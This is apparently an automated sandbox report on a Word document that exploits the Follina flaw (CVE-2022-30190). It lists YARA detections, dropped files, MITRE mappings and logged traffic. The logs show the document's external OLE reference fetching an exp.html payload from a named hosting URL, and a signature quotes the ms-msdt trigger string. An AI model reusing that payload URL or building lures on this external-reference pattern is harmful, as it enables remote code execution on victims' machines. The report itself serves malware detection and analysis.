Edit tour

Windows Analysis Report
test_exploit.docx.vir

Overview

General Information

Sample Name:	test_exploit.docx.vir (renamed file extension from vir to docx)
Analysis ID:	648185
MD5:	fcb4a6f299be7168bea772af871e203e
SHA1:	26428cb21220443643e53c619a98dac6d35acae6
SHA256:	e907ec4b1da6b2fa4e2fcff5b80d8c004f3b8922fcf62a76988a5a16036dcf8f
Tags:	doc
Infos:

Detection

Follina CVE-2022-30190

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Malicious sample detected (through community Yara rule)

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1472 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x37a:$olerel: relationships/oleObject 0x393:$target1: Target="http 0x3c9:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0xef6:$re1: location.href = "ms-msdt: 0x2a6d:$re1: location.href = "ms-msdt:
sslproxydump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B18D662.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83FA24C0.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B18D662.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83FA24C0.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm, type: DROPPED

Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49178 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 145.14.144.188:443 -> 192.168.2.22:49171 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 145.14.144.188:443

Source: global traffic

DNS query: name: samisoooo.000webhostapp.com

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 145.14.144.188:443

Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 145.14.144.66:443 -> 192.168.2.22:49178 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	String found in binary or memory: https://samisoooo.000webhostapp.com/e
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	String found in binary or memory: https://samisoooo.000webhostapp.com/exp.
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr, ~WRS{E3155A32-4109-4836-B85D-FBC05DE1F998}.tmp.0.dr	String found in binary or memory: https://samisoooo.000webhostapp.com/exp.html
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	String found in binary or memory: https://samisoooo.000webhostapp.com/exp.htmloooo.000webhostapp.com/e
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	String found in binary or memory: https://samisoooo.000webhostapp.com/exp.htmlyX
Source: exp[1].htm.0.dr	String found in binary or memory: https://www.bbc.com/news/live/world-europe-60517447

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E26B072-EAB3-41AA-AF89-735B4390C5D9}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: samisoooo.000webhostapp.com

Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 145.14.144.188:443 -> 192.168.2.22:49171 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: sslproxydump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: document.xml.rels, type: SAMPLE	Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents

Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: test_exploit.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\test_exploit.docx.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$st_exploit.docx.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5E26.tmp

Jump to behavior

Source: classification engine

Classification label: mal60.expl.evad.winDOCX@1/22@7/2

Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: test_exploit.docx.docx

Initial sample: OLE zip file path = word/media/image1.wmf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: https://samisoooo.000webhostapp.com/exp.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
test_exploit.docx.docx	5%	Virustotal		Browse
test_exploit.docx.docx	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
us-east-1.route-1.000webhost.awex.io	1%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us-east-1.route-1.000webhost.awex.io	145.14.144.188	true	false	1%, Virustotal, Browse	unknown
samisoooo.000webhostapp.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://samisoooo.000webhostapp.com/e	~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp.0.dr	false		high
https://www.bbc.com/news/live/world-europe-60517447	exp[1].htm.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
145.14.144.66	unknown	Netherlands		204915	AWEXUS	false
145.14.144.188	us-east-1.route-1.000webhost.awex.io	Netherlands		204915	AWEXUS	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	648185
Start date and time: 18/06/202216:59:06	2022-06-18 16:59:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	test_exploit.docx.vir (renamed file extension from vir to docx)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.expl.evad.winDOCX@1/22@7/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
145.14.144.66	j6RwLGBzlz.exe	Get hash	malicious	Browse	gdelogiblya.000webhostapp.com/index.php
145.14.144.188	Inf_3679290886US_May_22_2019.doc	Get hash	malicious	Browse	aspectivesolutions.com/wp-admin/02518/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us-east-1.route-1.000webhost.awex.io	MAGICD_1.exe.exe	Get hash	malicious	Browse	145.14.145.68
	9C78846071126D7F29A8B82B699903031D7D2CD837DF9.exe	Get hash	malicious	Browse	145.14.145.22
	https://trk.klclick3.com/ls/click?upn=UaD9A-2F-2FUcB1Y-2BmlWGyK8zQoUuUpG6MI-2F-2BOJEfhRB4O8Q5AU9n7JBkESdBNQckELmLx4cruopC7lWKWeQ3tJBFA-2FBWQAEhHhrTyXk5muEIo70alpUMsDHhKHWeZYTZE0MDFvNPIIB0xUlAaQgdN0Stg-3D-3Dwo8q_cXFzJ7fWxEqUOkRXSXNw8dqdf9NThO25brxiFNzS0eToP-2FOVkE5kUCgdy12nQfEY9cXCZadWTlyf-2BNxHlO1kpdqtZ6bQ8wE4kvW9XT7uR9BpSm9bw2xCFoHx9x7tVuOtZMbI8-2Fx3n9PdsqunwTMgODlOqgKiP2ShIgGZSwCdsalvFGPRNy8WAM1G7A2K8DX2weJn5eqkxdVAEKE7-2FV-2FrcX19-2B-2BrADR-2FulGbEJCcZJuwolCSER3Oi9WqAANwKWjWo0CI6uVzfzTtHbqh3-2FfKNVEE8Z0TpHLc4SUePDZ-2B1-2F2kLGphgYVmJdCC2Qts6Wfp45vk9Y7oezYKCZerzek3tBv6MT91FQ-2BkOOsil5ocEBNENyIgVSQ1Mcv7TdU0F123g-2FminCLTm0ZPqkzqjPfGOAQ-3D-3D#jen@orts.co.za	Get hash	malicious	Browse	145.14.145.1
	QolbxOSpEp.exe	Get hash	malicious	Browse	145.14.145.35
	Swift MT103 PDF.exe	Get hash	malicious	Browse	145.14.144.2
	rNl1OKDDbD.exe	Get hash	malicious	Browse	145.14.144.42
	https://pythonhero.000webhostapp.com/wp-inlcudes/maximaser/oklasers/penduiguim/redirectv5/anne-gaelle.tabourdeau-carpentier@chantiers-atlantique.com	Get hash	malicious	Browse	145.14.145.59
	QUOTATION SHEET ATTACHED_000848394.exe	Get hash	malicious	Browse	145.14.145.187
	864448901D066F7FA4835E4C12341D60BF7F610D8C455.exe	Get hash	malicious	Browse	145.14.145.42
	http://htf.express-highway.or.jp/htf2019/images/img/module/index.html	Get hash	malicious	Browse	145.14.144.174
	http://www.fukuda-dent.jp/multiphp/media/index.html	Get hash	malicious	Browse	145.14.145.21
	SecuriteInfo.com.W32.AIDetectNet.01.13850.exe	Get hash	malicious	Browse	145.14.144.140
	SecuriteInfo.com.W32.AIDetectNet.01.10876.exe	Get hash	malicious	Browse	145.14.144.21
	XIGWDhcKsw.exe	Get hash	malicious	Browse	145.14.144.197
	Pago.exe	Get hash	malicious	Browse	145.14.144.111
	https://staffbenefitaccess23.000webhostapp.com/1	Get hash	malicious	Browse	145.14.145.88
	SecuriteInfo.com.ArtemisDEAFCB87BC59.30021.exe	Get hash	malicious	Browse	145.14.145.114
	Itens listados.exe	Get hash	malicious	Browse	145.14.145.147
	SecuriteInfo.com.ArtemisC7D2FAA51271.23226.exe	Get hash	malicious	Browse	145.14.144.203
	https://austr6574.000webhostapp.com/	Get hash	malicious	Browse	145.14.144.32

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AWEXUS	crmpsl.vir	Get hash	malicious	Browse	153.93.58.250
	Documents for your perusal.js	Get hash	malicious	Browse	145.14.144.149
	agent_tesla.exe	Get hash	malicious	Browse	145.14.145.177
	Agreement documents..js	Get hash	malicious	Browse	145.14.145.177
	9C78846071126D7F29A8B82B699903031D7D2CD837DF9.exe	Get hash	malicious	Browse	145.14.145.22
	CeGxR6XecE	Get hash	malicious	Browse	153.93.242.137
	NC4RB7Mbx9	Get hash	malicious	Browse	153.93.106.234
	lGXq9Y3KxS	Get hash	malicious	Browse	153.93.154.108
